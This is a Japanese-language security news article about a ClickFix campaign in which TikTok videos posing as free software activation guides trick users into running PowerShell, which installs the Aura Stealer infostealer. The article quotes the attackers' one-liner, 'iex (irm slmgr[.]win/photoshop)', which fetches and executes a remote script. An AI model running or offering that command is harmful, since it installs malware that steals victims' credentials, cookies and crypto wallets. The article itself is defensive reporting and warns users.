はじめに
サイバー犯罪者が、TikTok動画を悪用して情報窃取マルウェアを拡散する「ClickFix」攻撃を継続しています。これらの動画は、Windows、Spotify、Netflixなどの人気ソフトウェアの無料アクティベーションガイドを装い、ユーザーを騙して悪意のあるスクリプトを実行させ、マルウェアに感染させます。
攻撃の概要
このキャンペーンは、ISC HandlerのXavier Mertens氏によって発見され、Trend Microが5月に観測したものとほぼ同じ手口です。TikTok動画は、Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro、Discord Nitroといった正規製品や、Netflix、Spotify Premiumといった架空のサービスの無料アクティベーション方法を提示します。
動画は、ユーザーに「iex (irm slmgr[.]win/photoshop)」のような短いワンラインコマンドを管理者としてPowerShellで実行するよう指示します。これは、ユーザーを騙して悪意のある「修正」や指示を実行させるソーシャルエンジニアリング手法である「ClickFix」攻撃の一種です。
技術的な詳細
ユーザーが指示されたコマンドを実行すると、PowerShellはリモートサイト「slmgr[.]win」に接続し、別のPowerShellスクリプトを取得して実行します。このスクリプトは、Cloudflare Pagesから2つの実行ファイルをダウンロードします。
- 1つ目の実行ファイルは「updater.exe」(VirusTotalリンクあり)で、これは情報窃取マルウェア「Aura Stealer」の亜種です。Aura Stealerは、ブラウザに保存された認証情報、認証クッキー、仮想通貨ウォレット、その他のアプリケーションの認証情報を収集し、攻撃者にアップロードすることで、ユーザーのアカウントへのアクセスを可能にします。
- 2つ目のペイロードは「source.exe」(VirusTotalリンクあり)と名付けられており、.NETに組み込まれたVisual C# Compiler (csc.exe) を使用してコードを自己コンパイルし、メモリに注入・起動されます。この追加ペイロードの目的は現時点では不明です。
ユーザーへの警告と対策
これらの手順を実行してしまったユーザーは、すべての認証情報が侵害されたとみなし、直ちにアクセスしているすべてのサイトでパスワードをリセットするべきです。
一般的なルールとして、ユーザーはウェブサイトからテキストをコピーし、オペレーティングシステムのダイアログボックス(ファイルエクスプローラーのアドレスバー、コマンドプロンプト、PowerShellプロンプト、macOSターミナル、Linuxシェルなど)で実行するべきではありません。
背景と関連情報
ClickFix攻撃は過去1年間で非常に普及しており、ランサムウェアや仮想通貨窃盗キャンペーンで様々なマルウェアを配布するために利用されています。この種の攻撃は、ユーザーの不注意や知識不足を悪用する典型的なソーシャルエンジニアリングの例です。